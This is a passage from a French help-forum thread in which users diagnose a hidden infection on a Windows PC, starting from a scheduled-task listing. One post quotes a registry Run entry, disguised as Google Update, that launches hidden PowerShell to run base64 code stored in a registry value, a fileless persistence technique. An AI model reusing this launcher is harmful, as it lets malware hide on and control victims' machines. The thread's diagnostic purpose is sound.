    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\SideShow\SessionAgent
    Prochaine exécution:         Désactivée
    Statut:                      Non démarrée
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\SideShow\SystemDataProviders
    Prochaine exécution:         Désactivée
    Statut:                      Non démarrée
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\SoftwareProtectionPlatform
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\SystemRestore
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\SystemRestore\SR
    Prochaine exécution:         30/03/2016 00:00:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\SystemRestore\SR
    Prochaine exécution:         30/03/2016 00:00:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Task Manager
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Task Manager\Interactive
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Tcpip
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Tcpip\IpAddressConflict1
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Tcpip\IpAddressConflict2
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\TextServicesFramework
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\TextServicesFramework\MsCtfMonitor
    Prochaine exécution:         N/A
    Statut:                      En cours
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Time Synchronization
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Time Synchronization\SynchronizeTime
    Prochaine exécution:         03/04/2016 01:00:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\UPnP
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\UPnP\UPnPHostConfig
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\User Profile Service
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\User Profile Service\HiveUploadTask
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\WDI
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\WDI\ResolutionHost
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Windows Activation Technologies
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Windows Activation Technologies\ValidationTask
    Prochaine exécution:         19/06/2016 15:29:44
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline
    Prochaine exécution:         29/06/2016 15:29:44
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Windows Error Reporting
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Windows Error Reporting\QueueReporting
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Windows Filtering Platform
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Windows Media Sharing
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Windows Media Sharing\UpdateLibrary
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\WindowsBackup
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\WindowsBackup\ConfigNotification
    Prochaine exécution:         30/03/2016 10:00:00
    Statut:                      Non démarrée
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\WindowsColorSystem
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\WindowsColorSystem\Calibration Loader
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\WindowsColorSystem\Calibration Loader
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Wininet
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Wininet\CacheTask
    Prochaine exécution:         N/A
    Statut:                      En cours
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows Live
    INFORMATION : aucune tâche planifiée n'est actuellement disponible à votre niveau d'accès.
    
    Dossier : \Microsoft\Windows Live\SOXE
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task
    Prochaine exécution:         06/04/2016 07:04:15
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task
    Prochaine exécution:         08/04/2016 19:14:43
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \OfficeSoftwareProtectionPlatform
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \OfficeSoftwareProtectionPlatform\SvcRestartTask
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan

  9. #9
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 839
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 48
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 839
    Points : 9 222
    Points
    9 222
    Par défaut
    Gotcha !
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    Google Update    REG_SZ    "C:\Users\michael\AppData\Local\Google\Update\GoogleUpdate.exe" /c
        {BE9473EA-5660-4BF7-91C3-2A2258213EE1}    REG_SZ    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));
    It's a virus
    Bon, juste tu kill ce process mais ne supprime pas cette valeur afin de la capturer et on va essayer de la décoder pour voir ce qu'il fait ce genre de virus

  10. #10
    Membre éclairé
    Homme Profil pro
    nop
    Inscrit en
    Mars 2015
    Messages
    436
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Somme (Picardie)

    Informations professionnelles :
    Activité : nop
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Mars 2015
    Messages : 436
    Points : 658
    Points
    658
    Par défaut
    Citation Envoyé par cerede2000 Voir le message
    Tien c'est marrant Hackoo tu as ouvert un sujet sur Stackoverflow....

    En effet curieux ce truc....

    Ce qui est sur ce que ce que fais le script est plus que suspect !
    Il chercher à lancer avec Invoke-Expression (iex) une programme dans le chemin est placé dans la clé registre :
    HKCU:\Software\Classes\ZXWNMNLIMAGAL
    Valeur : LOOTDA

    Je te conseille d'aller voir dans le registre déjà ce que contient cette valeur
    En sachant qu'elle est encodée en Base64, colle la ici on va la décrypter.
    voilà ce que ça donne :
    à 'affichage string, ça montre rien, mais en binaire ça donne ceci, comment décoder :

    Le texte que vous avez entré est trop long (723275 caractères). Veuillez le raccourcir à 100000 caractères.
    donc j'ai mis le .reg en pièce jointe (1.5 mo quand-même le script codé)
    truc_bizarre.zip

    Attention, car c'est peut-être dangereux (créant un script de phishing peut-être via outllook/vba).
    j'ai passé plusieurs antivirus, et aucun ne l'avait remarqué. idem pour les antimalware : nada!

    si ça peut aider au décodage, voilà le contenu du mail envoyé (et qui n'est pas dans ma sendbox) quand je ne suis pas là (je le récupère car je reçois des erreurs de destionation d'email obsolète, je suppose que le scrip regarde mon arriéré):
    surtout ne cliquez pas sur le lien

  11. #11
    Membre expert
    Homme Profil pro
    Architecte de système d'information
    Inscrit en
    Juillet 2004
    Messages
    2 725
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 37
    Localisation : France, Sarthe (Pays de la Loire)

    Informations professionnelles :
    Activité : Architecte de système d'information

    Informations forums :
    Inscription : Juillet 2004
    Messages : 2 725
    Points : 3 338
    Points
    3 338
    Par défaut
    Je confirme c'est un virus qui pue, pas le temps de regarder précisément ce que ça fait....
    Mais après décryptage de la valeur de la clé registre c'est un script Powershell qui sent vraiment pas bon !

    Tu devrais :
    1. Scanner ton PC avec MalwareByte ou un truc du genre
    2. Changer d'antivirus au plus vite
    3. Eviter de saisir des données sensibles tant que ce n'est pas éradiquer !
    Par pitié !!!! :Si vous ne savez pas faire cliquez ici !
    Citation Envoyé par Marc-L
    C'est dommage que parfois tu sois aussi lourd que tu as l'air intelligent…

  12. #12
    Membre éclairé
    Homme Profil pro
    nop
    Inscrit en
    Mars 2015
    Messages
    436
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Somme (Picardie)

    Informations professionnelles :
    Activité : nop
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Mars 2015
    Messages : 436
    Points : 658
    Points
    658
    Par défaut
    puis-je supprimer la valeur dans le registrer sans créer de bug windows (genre impossibilité de redémarrer) ?
    il est associé au service google update...étrange quand-même...

  13. #13
    Membre expert
    Homme Profil pro
    Architecte de système d'information
    Inscrit en
    Juillet 2004
    Messages
    2 725
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 37
    Localisation : France, Sarthe (Pays de la Loire)

    Informations professionnelles :
    Activité : Architecte de système d'information

    Informations forums :
    Inscription : Juillet 2004
    Messages : 2 725
    Points : 3 338
    Points
    3 338
    Par défaut
    Oui sans soucis
    Ou as tu récupérer ton setup de Google Chrome ?

    Car j'ai vérifier sur quelques postes sur lesquels j'ai Chrome et je n'ai pas cette clé bizarre.....
    Et quand on voit comment tout est masqué dans le script PS décrypter c'est vraiment ultra-douteux !
    Par pitié !!!! :Si vous ne savez pas faire cliquez ici !
    Citation Envoyé par Marc-L
    C'est dommage que parfois tu sois aussi lourd que tu as l'air intelligent…

  14. #14
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 839
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 48
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 839
    Points : 9 222
    Points
    9 222
    Par défaut
    Citation Envoyé par MichaelREMY Voir le message
    puis-je supprimer la valeur dans le registrer sans créer de bug windows (genre impossibilité de redémarrer) ?
    il est associé au service google update...étrange quand-même...
    Oui, tu peux la supprimer sans soucis !
    Heuresement que le script batch a détecté quelque chose il est plus inteligent que les autres antivirus
    La question qui se pose : Pourquoi la plus part des antivirus ou antimalwares non pas détécté ce genre de virus
    Car c'est un nouveau virus encodé (crypté )
    Bon, je ne sais pas comment tu as reçu ce virus mais sachez bien que le virus lui même crée cette valeur de GoogleUpdate dans la base de registre pour le camouflage !

  15. #15
    Membre éclairé
    Homme Profil pro
    nop
    Inscrit en
    Mars 2015
    Messages
    436
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Somme (Picardie)

    Informations professionnelles :
    Activité : nop
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Mars 2015
    Messages : 436
    Points : 658
    Points
    658
    Par défaut
    Citation Envoyé par hackoofr Voir le message
    Oui, tu peux la supprimer sans soucis !
    Heuresement que le script batch a détecté quelque chose il est plus inteligent que les autres antivirus

    Car c'est un nouveau virus encodé (crypté )
    Bon, je ne sais pas comment tu as reçu ce virus mais sachez bien que le virus lui même crée cette valeur de GoogleUpdate dans la base de registre pour le camouflage !

    je soupçonne autre chose que google d'avoir fait cela vu que je n'ai plus googlechrome sur mon poste, que GoogleEarth (télécharger sur google official, la version licence free).
    mais bon, n'importe quel programme peut créer un dossier et un exé du nom de google...
    c'est dommage que les antivirus ne vérifie pas l'empreinte (gnere md5) de chaque exe ou que l'antivirus n'ait pas une liste des paramétres des exes.

    nouveau virus je sais pas, car j'ai ce truc là depuis je pense 6 mois et j'ai toujours cru que c'était une mise à jour windows (qui mettait le powershell en process).
    Avant de le supprimer, j'ai désactiver les process de mise à jour google (qui sont toujours là et ça c'est bizarre)

  16. #16
    Membre expert
    Homme Profil pro
    Architecte de système d'information
    Inscrit en
    Juillet 2004
    Messages
    2 725
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 37
    Localisation : France, Sarthe (Pays de la Loire)

    Informations professionnelles :
    Activité : Architecte de système d'information

    Informations forums :
    Inscription : Juillet 2004
    Messages : 2 725
    Points : 3 338
    Points
    3 338
    Par défaut
    Pfff le problème de l'empreinte MD5 c'est que c'est plus ou moins falsifiable maintenant....
    Après oui sur des hashs plus robuste pourquoi pas, mais s'il ne le font pas j'imagine qu'il y a une bonne raison.
    Et puis les MAJ qui s’enchaîne, les version beta c'est surement assez complexe à gérer après derrière.

    En tous cas il est clair que le truc que tu as pu de la ou je pense
    Déjà si tu dégage les clés registre et le programme d'update ça sera pas mal
    Par pitié !!!! :Si vous ne savez pas faire cliquez ici !
    Citation Envoyé par Marc-L
    C'est dommage que parfois tu sois aussi lourd que tu as l'air intelligent…

  17. #17
    Membre éclairé
    Homme Profil pro
    nop
    Inscrit en
    Mars 2015
    Messages
    436
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Somme (Picardie)

    Informations professionnelles :
    Activité : nop
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Mars 2015
    Messages : 436
    Points : 658
    Points
    658
    Par défaut
    j'ai mis résolu car j'ai identifié la source.

    mais étrangement je ne peux pas supprimer la clé ni la renommer, ni la classe alors que je suis admin !
    vraiment étrange !

    Suppression de ZXWNMNLIMAGAL impossible : erreur lors de la suppression de la clé.

  18. #18
    Membre expert
    Homme Profil pro
    Architecte de système d'information
    Inscrit en
    Juillet 2004
    Messages
    2 725
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 37
    Localisation : France, Sarthe (Pays de la Loire)

    Informations professionnelles :
    Activité : Architecte de système d'information

    Informations forums :
    Inscription : Juillet 2004
    Messages : 2 725
    Points : 3 338
    Points
    3 338
    Par défaut
    Oula encore plus étrange effectivement.
    Vérifie les droits sur la clé registre et rajoute toi directement
    Par pitié !!!! :Si vous ne savez pas faire cliquez ici !
    Citation Envoyé par Marc-L
    C'est dommage que parfois tu sois aussi lourd que tu as l'air intelligent…

  19. #19
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 839
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 48
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 839
    Points : 9 222
    Points
    9 222
    Par défaut
    Citation Envoyé par MichaelREMY Voir le message
    j'ai mis résolu car j'ai identifié la source.

    mais étrangement je ne peux pas supprimer la clé ni la renommer, ni la classe alors que je suis admin !
    vraiment étrange !

    Suppression de ZXWNMNLIMAGAL impossible : erreur lors de la suppression de la clé.
    Dans ce cas ce n'est pas resolu
    Laisser cette discussion ouverte elle très importante ! il faut qu'on résout cette bestiole

  20. #20
    Membre éclairé
    Homme Profil pro
    nop
    Inscrit en
    Mars 2015
    Messages
    436
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Somme (Picardie)

    Informations professionnelles :
    Activité : nop
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Mars 2015
    Messages : 436
    Points : 658
    Points
    658
    Par défaut
    Citation Envoyé par cerede2000 Voir le message
    Oula encore plus étrange effectivement.
    Vérifie les droits sur la clé registre et rajoute toi directement
    il n'y avait que "tout le monde" dans la liste des autorisations et rien (aucune case) n'était coché...étrange !
    j'ai rajouté mon compte et celui d'admin de la machine en cochant tout et je n'ai pas pu la supprimé !

    je suis revenu et j'ai ensuite coché toutes les cases pour "tout le monde" et là la suppression de la classe a fonctionné enfin !
    vraiment étrange.

Discussions similaires

  1. Réponses: 13
    Dernier message: 16/11/2015, 23h42
  2. Réponses: 2
    Dernier message: 17/04/2014, 11h22
  3. Réponses: 3
    Dernier message: 12/03/2012, 20h23
  4. Réponses: 3
    Dernier message: 11/07/2008, 12h56
  5. Réponses: 3
    Dernier message: 16/06/2003, 16h51

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo